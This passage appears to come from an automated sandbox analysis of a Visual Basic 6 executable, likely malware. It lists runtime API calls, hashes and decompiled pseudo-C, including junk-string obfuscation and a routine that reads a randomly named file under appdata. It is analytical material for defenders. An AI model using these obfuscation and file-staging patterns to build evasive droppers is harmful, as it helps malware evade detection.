      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402344,00000714), ref: 0041D34C
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000714), ref: 0041D357
      • __vbaLenBstr.MSVBVM60(Generalisations7), ref: 0041D361
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000718), ref: 0041D3B4
      • #525.MSVBVM60(00000067), ref: 0041D3D3
      • __vbaStrMove.MSVBVM60(00000067), ref: 0041D3E0
      • #618.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D3EC
      • __vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D3F9
      • __vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D41D
      • __vbaStrCopy.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D440
      • __vbaStrMove.MSVBVM60(?,SOLITRSKAKKEN,Indvi2,Fdres,?,STRUTTENDE,00000017,00000067), ref: 0041D46E
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,0000071C), ref: 0041D4AB
      • __vbaStrMove.MSVBVM60(00000000,00401260,00402344,0000071C), ref: 0041D4DB
      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0041D505
      • #564.MSVBVM60(00000005,?), ref: 0041D53D
      • __vbaHresultCheck.MSVBVM60(00000000), ref: 0041D557
      • #541.MSVBVM60(?,16:16:16), ref: 0041D577
      • __vbaStrVarVal.MSVBVM60(?,?,?,16:16:16), ref: 0041D58A
      • #519.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D590
      • __vbaStrMove.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D59D
      • #648.MSVBVM60(0000000A,00000000,?,?,?,16:16:16), ref: 0041D5BD
      • __vbaStrMove.MSVBVM60(?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D609
      • __vbaI4Var.MSVBVM60(?,00000000,?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D616
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000720), ref: 0041D64C
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D682
      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041D6A8
      • #696.MSVBVM60(00402904), ref: 0041D6B5
      • #696.MSVBVM60(0040294C,00402904), ref: 0041D6C6
      • __vbaStrCopy.MSVBVM60(0040294C,00402904), ref: 0041D6DD
      • __vbaFreeStr.MSVBVM60 ref: 0041D723
      • __vbaVarMove.MSVBVM60 ref: 0041D74A
      • __vbaVarMove.MSVBVM60 ref: 0041D76C
      • __vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041D780
      • __vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041D786
      • __vbaFreeVar.MSVBVM60(0041D878), ref: 0041D820
      • __vbaFreeStr.MSVBVM60(0041D878), ref: 0041D828
      • __vbaAryDestruct.MSVBVM60(00000000,?,0041D878), ref: 0041D83F
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D847
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D84F
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D857
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D85F
      • __vbaFreeVar.MSVBVM60(00000000,?,0041D878), ref: 0041D867
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D872
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$Move$CheckHresult$List$#648#696$Copy$Bstr$#519#564$#541#574#705#713$#522#524#525#527#535#537#558#560#581#606#607#610#618#661#670#685#690#714ChkstkConstruct2DestructIdivNew2
      • String ID: 16:16:16$7:7:7$=9$ADMIRINGLY$ASCRY$Admiraliteternes1$Benefact6$Bursati$CANNIBALEAN$DUMBFISH$Dagvagten$Fdres$Forretningsbrevet5$Generalisations7$Hjortens$Indvi2$Kainsmrkernes3$Lersernes$OFFENTLIGHEDSSFRE$Odontoma7$Paucify9$RODTEGNENES$Readjust$SELVFINANSIEREDES$SOLITRSKAKKEN$STRUTTENDE$Skovteknikeren6$Snoreskrternes8$Udstillingslokalet$Utrecht8$Vidnefast$Whiskysourens1$blaarv$centralregeringens$eudaemonistical$multivalent$replicr$tilskrersaksene$tril$undrede
      • API String ID: 1918163132-2023598156
      • Opcode ID: d8af4b4ed56b1ce04ec80369087825d785397d132b71784da8bc56000821cb97
      • Instruction ID: d19f65dcb5dca34613dcd9d285a75da2da83534f200251e5906f204df5f4b324
      • Opcode Fuzzy Hash: d8af4b4ed56b1ce04ec80369087825d785397d132b71784da8bc56000821cb97
      • Instruction Fuzzy Hash: 42D2F875940228ABDB21EF61CD85FDDB7B8AF04304F1080EAE509BB2A1DB785B85CF55
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 59%
      			E0041FAD0(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a8) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				void* _v28;
      				void* _v32;
      				intOrPtr _v36;
      				void* _v40;
      				short* _v52;
      				char _v64;
      				short _v72;
      				void* _v76;
      				char _v80;
      				void* _v84;
      				intOrPtr _v92;
      				char _v100;
      				char _v116;
      				intOrPtr _v124;
      				char _v132;
      				short _v140;
      				char _v148;
      				char _v164;
      				intOrPtr _v172;
      				char _v180;
      				char* _v204;
      				intOrPtr _v212;
      				void* _v232;
      				char _v236;
      				short _v240;
      				signed int _v244;
      				intOrPtr* _v248;
      				signed int _v252;
      				intOrPtr* _v264;
      				signed int _v268;
      				signed int _v272;
      				signed int _t182;
      				short _t184;
      				char* _t191;
      				short _t193;
      				char* _t201;
      				short _t204;
      				short _t208;
      				char* _t210;
      				short _t213;
      				signed int _t214;
      				signed int _t216;
      				signed int _t218;
      				signed int _t220;
      				short _t222;
      				signed int _t223;
      				signed int _t225;
      				signed int _t227;
      				signed int _t229;
      				signed int _t231;
      				signed int _t232;
      				signed int _t233;
      				signed int _t235;
      				short _t237;
      				signed int _t238;
      				signed int _t240;
      				short _t242;
      				signed int _t243;
      				char* _t245;
      				char* _t250;
      				signed int _t259;
      				signed int _t264;
      				signed int _t278;
      				signed int _t287;
      				signed int _t296;
      				signed int _t300;
      				signed int _t305;
      				void* _t334;
      				void* _t336;
      				intOrPtr _t337;
      				void* _t338;
      
      				_t337 = _t336 - 0xc;
      				 *[fs:0x0] = _t337;
      				L00401540();
      				_v16 = _t337;
      				_v12 = 0x4013d0;
      				_v8 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t334);
      				L004017B6();
      				_push(2);
      				_push(0x402ff8);
      				_t182 =  &_v64;
      				_push(_t182);
      				L0040186A();
      				if((_t182 | 0xffffffff) != 0) {
      					_v92 = 0x80020004;
      					_v100 = 0xa;
      					_push( &_v100);
      					L00401648();
      					_v36 = __fp0;
      					L00401828();
      					_push(0xd4);
      					L00401786();
      					L0040183A();
      				}
      				_v124 = 0x80020004;
      				_v132 = 0xa;
      				_t184 =  &_v132;
      				_push(_t184);
      				L004017F2();
      				_v140 = _t184;
      				_v148 = 2;
      				_push( &_v148);
      				_push( &_v164);
      				L004016C0();
      				_push(L"Rappees");
      				_push(L"Jiggerens");
      				_push( &_v100); // executed
      				L00401732(); // executed
      				_push( &_v100);
      				_push( &_v116);
      				L00401852();
      				_push(0x52);
      				_push( &_v164);
      				_t191 =  &_v80;
      				_push(_t191);
      				L00401858();
      				_push(_t191);
      				L0040162A();
      				_v172 = _t191;
      				_v180 = 0x8008;
      				_push( &_v116);
      				_t193 =  &_v180;
      				_push(_t193);
      				L00401738();
      				_v240 = _t193;
      				L00401846();
      				_push( &_v180);
      				_push( &_v116);
      				_push( &_v164);
      				_push( &_v148);
      				_push( &_v132);
      				_push( &_v100);
      				_push(6);
      				L00401840();
      				_t338 = _t337 + 0x1c;
      				if(_v240 != 0) {
      					_v204 = L"PREHISTORICS";
      					_v212 = 8;
      					L0040184C();
      					_push(0xa2);
      					_push( &_v100);
      					_push( &_v116);
      					L00401624();
      					_v124 = 0x8d;
      					_v132 = 2;
      					_push( &_v132);
      					_push(0x75);
      					_push( &_v116);
      					_t250 =  &_v80;
      					_push(_t250);
      					L00401858();
      					_push(_t250);
      					L004016A2();
      					L0040183A();
      					L00401846();
      					_push( &_v132);
      					_push( &_v116);
      					_push( &_v100);
      					_push(3);
      					L00401840();
      					_t338 = _t338 + 0x10;
      					if( *0x4223c0 != 0) {
      						_v264 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v264 = 0x4223c0;
      					}
      					_v240 =  *_v264;
      					_t259 =  *((intOrPtr*)( *_v240 + 0x14))(_v240,  &_v84);
      					asm("fclex");
      					_v244 = _t259;
      					if(_v244 >= 0) {
      						_v268 = _v268 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x402590);
      						_push(_v240);
      						_push(_v244);
      						L004017C8();
      						_v268 = _t259;
      					}
      					_v248 = _v84;
      					_t264 =  *((intOrPtr*)( *_v248 + 0xc0))(_v248,  &_v232);
      					asm("fclex");
      					_v252 = _t264;
      					if(_v252 >= 0) {
      						_v272 = _v272 & 0x00000000;
      					} else {
      						_push(0xc0);
      						_push(0x4025b0);
      						_push(_v248);
      						_push(_v252);
      						L004017C8();
      						_v272 = _t264;
      					}
      					_v72 = _v232;
      					L004017C2();
      				}
      				_v92 = 0x3a;
      				_v100 = 2;
      				_t201 =  &_v100;
      				_push(_t201);
      				_push(8);
      				_push(L"UNINTERMITTEDLY");
      				L004016A2();
      				_v124 = _t201;
      				_v132 = 0x8008;
      				_push( &_v116);
      				L004017FE();
      				_push( &_v132);
      				_t204 =  &_v116;
      				_push(_t204);
      				L00401738();
      				_v240 = _t204;
      				_push( &_v116);
      				_push( &_v132);
      				_push( &_v100);
      				_push(3);
      				L00401840();
      				_t208 = _v240;
      				if(_t208 != 0) {
      					_push(0xb1);
      					L00401756();
      					L0040183A();
      					_push(_t208);
      					L004017EC();
      					 *_v52 = _t208;
      					L00401846();
      					_push(L"MINESTRYGNING");
      					L004017EC();
      					 *((short*)(_v52 + 2)) = _t208;
      					_push(L"2:2:2");
      					_push( &_v100);
      					L0040182E();
      					_push( &_v100);
      					_t213 =  &_v80;
      					_push(_t213);
      					L00401858();
      					_push(_t213);
      					L004017EC();
      					_t278 = 2;
      					 *((short*)(_v52 + (_t278 << 1))) = _t213;
      					L00401846();
      					L00401828();
      					_t214 = 2;
      					 *((short*)(_v52 + _t214 * 3)) = 0x4cf8;
      					_t216 = 2;
      					 *((short*)(_v52 + (_t216 << 2))) = 0xe04;
      					_t218 = 2;
      					 *((short*)(_v52 + _t218 * 5)) = 0x1773;
      					_t220 = 2;
      					 *((short*)(_v52 + _t220 * 6)) = 0x56a4;
      					_v92 = 0x42458a;
      					_v100 = 3;
      					_push(0xfffffffe);
      					_push(0xfffffffe);
      					_push(0xfffffffe);
      					_push(0xffffffff);
      					_t222 =  &_v100;
      					_push(_t222);
      					L0040161E();
      					L0040183A();
      					_push(_t222);
      					L004017EC();
      					_t287 = 2;
      					 *((short*)(_v52 + _t287 * 7)) = _t222;
      					L00401846();
      					L00401828();
      					_t223 = 2;
      					 *((short*)(_v52 + (_t223 << 3))) = 0x196e;
      					_t225 = 2;
      					 *((short*)(_v52 + _t225 * 9)) = 0x15b6;
      					_t227 = 2;
      					 *((short*)(_v52 + _t227 * 0xa)) = 0x1a5;
      					_t229 = 2;
      					 *((short*)(_v52 + _t229 * 0xb)) = 0x3c4c;
      					_t231 = 2;
      					_t232 = _t231 * 0xc;
      					 *((short*)(_v52 + _t232)) = 0x3974;
      					_push(L"Suppositoriets");
      					L004017EC();
      					_t296 = 2;
      					 *(_v52 + _t296 * 0xd) = _t232;
      					_t233 = 2;
      					 *((short*)(_v52 + _t233 * 0xe)) = 0x5ff7;
      					_t235 = 2;
      					 *((short*)(_v52 + _t235 * 0xf)) = 0x758c;
      					_v92 = 0x80020004;
      					_v100 = 0xa;
      					_t237 =  &_v100;
      					_push(_t237);
      					L004017F2();
      					_t300 = 2;
      					 *((short*)(_v52 + (_t300 << 4))) = _t237;
      					L00401828();
      					_t238 = 2;
      					 *((short*)(_v52 + _t238 * 0x11)) = 0xef8;
      					_t240 = 2;
      					 *((short*)(_v52 + _t240 * 0x12)) = 0x12b7;
      					_v92 = 0x80020004;
      					_v100 = 0xa;
      					_t242 =  &_v100;
      					_push(_t242);
      					L004017F2();
      					_t305 = 2;
      					 *((short*)(_v52 + _t305 * 0x13)) = _t242;
      					L00401828();
      					_t243 = 2;
      					 *((short*)(_v52 + _t243 * 0x14)) = 0x3e84;
      					_v92 = 0x57f4;
      					_v100 = 2;
      					_push(L"BESMUDSES");
      					_t245 =  &_v100;
      					_push(_t245);
      					L00401618();
      					L0040183A();
      					_push(_t245);
      					L00401696();
      					L0040183A();
      					L00401846();
      					L00401828();
      				}
      				asm("wait");
      				_push(0x4200fa);
      				L00401846();
      				L00401846();
      				L00401846();
      				_v236 =  &_v64;
      				_t210 =  &_v236;
      				_push(_t210);
      				_push(0);
      				L0040173E();
      				L00401846();
      				return _t210;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041FAEE
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FB18
      • __vbaAryConstruct2.MSVBVM60(?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FB28
      • #593.MSVBVM60(0000000A), ref: 0041FB46
      • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041FB51
      • #537.MSVBVM60(000000D4,0000000A), ref: 0041FB5B
      • __vbaStrMove.MSVBVM60(000000D4,0000000A), ref: 0041FB65
      • #648.MSVBVM60(0000000A), ref: 0041FB7C
      • #652.MSVBVM60(?,00000002,?,?,?,0000000A), ref: 0041FBA0
      • #692.MSVBVM60(?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBB3
      • #522.MSVBVM60(?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBC0
      • __vbaStrVarVal.MSVBVM60(?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBD2
      • #514.MSVBVM60(00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBD8
      • __vbaVarTstNe.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FBF8
      • __vbaFreeStr.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FC07
      • __vbaFreeVarList.MSVBVM60(00000006,?,0000000A,00000002,?,?,00008008,00008008,?,00000000,?,?,00000052,?,?,?), ref: 0041FC2F
      • __vbaVarDup.MSVBVM60 ref: 0041FC63
      • #513.MSVBVM60(?,?,000000A2), ref: 0041FC75
      • __vbaStrVarVal.MSVBVM60(?,?,00000075,00000002,?,?,000000A2), ref: 0041FC96
      • #628.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FC9C
      • __vbaStrMove.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FCA6
      • __vbaFreeStr.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FCAE
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,00000002,00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FCC1
      • __vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FCDC
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041FD3E
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,000000C0), ref: 0041FD9D
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,000000C0), ref: 0041FDBF
      • #628.MSVBVM60(UNINTERMITTEDLY,00000008,00000002), ref: 0041FDDD
      • #670.MSVBVM60(?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FDF0
      • __vbaVarTstNe.MSVBVM60(?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FDFD
      • __vbaFreeVarList.MSVBVM60(00000003,00000002,00008008,?,?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FE17
      • #525.MSVBVM60(000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE33
      • __vbaStrMove.MSVBVM60(000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE3D
      • #696.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE43
      • __vbaFreeStr.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE51
      • #696.MSVBVM60(MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE5B
      • #541.MSVBVM60(?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE70
      • __vbaStrVarVal.MSVBVM60(?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE7D
      • #696.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE83
      • __vbaFreeStr.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE97
      • __vbaFreeVar.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE9F
      • #702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FEFA
      • __vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF04
      • #696.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF0A
      • __vbaFreeStr.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF1F
      • __vbaFreeVar.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF27
      • #696.MSVBVM60(Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF7C
      • #648.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FFBE
      • __vbaFreeVar.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FFD3
      • #648.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420008
      • __vbaFreeVar.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042001D
      • #651.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420048
      • __vbaStrMove.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420052
      • __vbaStrCat.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420058
      • __vbaStrMove.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420062
      • __vbaFreeStr.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042006A
      • __vbaFreeVar.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420072
      • __vbaFreeStr.MSVBVM60(004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200C5
      • __vbaFreeStr.MSVBVM60(004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200CD
      • __vbaFreeStr.MSVBVM60(004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200D5
      • __vbaAryDestruct.MSVBVM60(00000000,?,004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200EC
      • __vbaFreeStr.MSVBVM60(00000000,?,004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200F4
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$Move$#696$#648List$#628CheckHresult$#513#514#522#525#537#541#593#651#652#670#692#702ChkstkConstruct2CopyDestructNew2
      • String ID: 2:2:2$:$BESMUDSES$Jiggerens$MINESTRYGNING$PREHISTORICS$Rappees$Suppositoriets$UNINTERMITTEDLY
      • API String ID: 2160480785-2797486545
      • Opcode ID: 740cc0b24e97e91ff2f29ee006d99298746f66b207f1b81d73c25490db96b919
      • Instruction ID: 0027439f186adb7de10d98962c97fdb4750209cdc544478769bcad2128c15f9d
      • Opcode Fuzzy Hash: 740cc0b24e97e91ff2f29ee006d99298746f66b207f1b81d73c25490db96b919
      • Instruction Fuzzy Hash: 1A026E71940218ABDB15EBA0DC96FEDB7B8BF04304F10816FE105BB1E2EB789A45CB54
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 48%
      			E0041D89C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				void* _v24;
      				void* _v28;
      				char _v32;
      				intOrPtr _v36;
      				signed int _v40;
      				void* _v44;
      				void* _v48;
      				char _v64;
      				char _v80;
      				char _v96;
      				char* _v104;
      				char _v112;
      				char* _v120;
      				char _v128;
      				void* _v148;
      				short _v152;
      				signed int _v156;
      				intOrPtr* _v160;
      				signed int _v164;
      				intOrPtr* _v172;
      				signed int _v176;
      				signed int _v180;
      				short _t78;
      				signed int _t79;
      				char* _t83;
      				char* _t88;
      				signed int _t99;
      				signed int _t104;
      				intOrPtr _t132;
      
      				_push(0x401546);
      				_push( *[fs:0x0]);
      				 *[fs:0x0] = _t132;
      				L00401540();
      				_v12 = _t132;
      				_v8 = 0x401270;
      				_push(L"Scopiformly9");
      				_push(L"baadene");
      				_push( &_v64); // executed
      				L00401732(); // executed
      				_v104 = L"Ambulancesagen2";
      				_v112 = 0x8008;
      				_push( &_v64);
      				_t78 =  &_v112;
      				_push(_t78);
      				L00401738();
      				_v152 = _t78;
      				L00401828();
      				_t79 = _v152;
      				if(_t79 != 0) {
      					_push(0x1b);
      					_push(L"Reklamekampagne4");
      					L00401750();
      					L0040183A();
      					if( *0x4223c0 != 0) {
      						_v172 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v172 = 0x4223c0;
      					}
      					_v152 =  *_v172;
      					_t99 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v48);
      					asm("fclex");
      					_v156 = _t99;
      					if(_v156 >= 0) {
      						_v176 = _v176 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x402590);
      						_push(_v152);
      						_push(_v156);
      						L004017C8();
      						_v176 = _t99;
      					}
      					_v160 = _v48;
      					_t104 =  *((intOrPtr*)( *_v160 + 0x118))(_v160,  &_v148);
      					asm("fclex");
      					_v164 = _t104;
      					if(_v164 >= 0) {
      						_v180 = _v180 & 0x00000000;
      					} else {
      						_push(0x118);
      						_push(0x4025b0);
      						_push(_v160);
      						_push(_v164);
      						L004017C8();
      						_v180 = _t104;
      					}
      					_t79 = _v148;
      					_v40 = _t79;
      					L004017C2();
      				}
      				L004017B6();
      				_push(0x44);
      				_push(_v36);
      				L00401750();
      				L0040183A();
      				_push(_t79);
      				_push(L"Jordfstedes4");
      				L0040172C();
      				asm("sbb eax, eax");
      				_v152 =  ~( ~( ~_t79));
      				L00401846();
      				_t83 = _v152;
      				if(_t83 != 0) {
      					_v104 = L"appdata";
      					_v112 = 8;
      					L0040184C();
      					_push( &_v64);
      					_push( &_v80);
      					L0040171A();
      					_v120 = L"\\XvFu5flZcgudIlwvVLtjOx372";
      					_v128 = 8;
      					_push( &_v80);
      					_push( &_v128);
      					_t88 =  &_v96;
      					_push(_t88);
      					L00401720();
      					_push(_t88);
      					L00401834();
      					L0040183A();
      					_push(_t88);
      					_push(1);
      					_push(0xffffffff);
      					_push(0x120);
      					L00401726();
      					L00401846();
      					_push( &_v96);
      					_push( &_v80);
      					_push( &_v64);
      					_push(3);
      					L00401840();
      					_push(1);
      					_push( &_v32);
      					_push(0);
      					L00401714();
      					_push(1);
      					L0040170E();
      					_push(0xec);
      					_push( &_v64);
      					L00401708();
      					_t83 =  &_v64;
      					_push(_t83);
      					L00401834();
      					L0040183A();
      					L00401828();
      				}
      				_push(0x41db88);
      				L00401846();
      				L00401846();
      				L00401846();
      				L00401846();
      				return _t83;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041D8B9
      • #692.MSVBVM60(?,baadene,Scopiformly9,?,?,?,?,00401546), ref: 0041D8D9
      • __vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041D8F4
      • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0041D903
      • #618.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041D91E
      • __vbaStrMove.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041D928
      • __vbaNew2.MSVBVM60(004025A0,004223C0,Reklamekampagne4,0000001B,00008008,?), ref: 0041D940
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041D9A2
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000118,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DA01
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4,0000001B,00008008), ref: 0041DA23
      • __vbaStrCopy.MSVBVM60(00008008,?), ref: 0041DA30
      • #618.MSVBVM60(?,00000044,00008008,?), ref: 0041DA3A
      • __vbaStrMove.MSVBVM60(?,00000044,00008008,?), ref: 0041DA44
      • __vbaStrCmp.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA4F
      • __vbaFreeStr.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA66
      • __vbaVarDup.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA8E
      • #666.MSVBVM60(?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA9B
      • __vbaVarCat.MSVBVM60(?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DABA
      • __vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAC0
      • __vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DACA
      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAD9
      • __vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAE1
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000), ref: 0041DAF4
      • __vbaGet3.MSVBVM60(00000000,?,00000001), ref: 0041DB04
      • __vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0041DB0B
      • #526.MSVBVM60(?,000000EC,00000001,00000000,?,00000001), ref: 0041DB19
      • __vbaStrVarMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB22
      • __vbaStrMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB2C
      • __vbaFreeVar.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB34
      • __vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB6A
      • __vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB72
      • __vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB7A
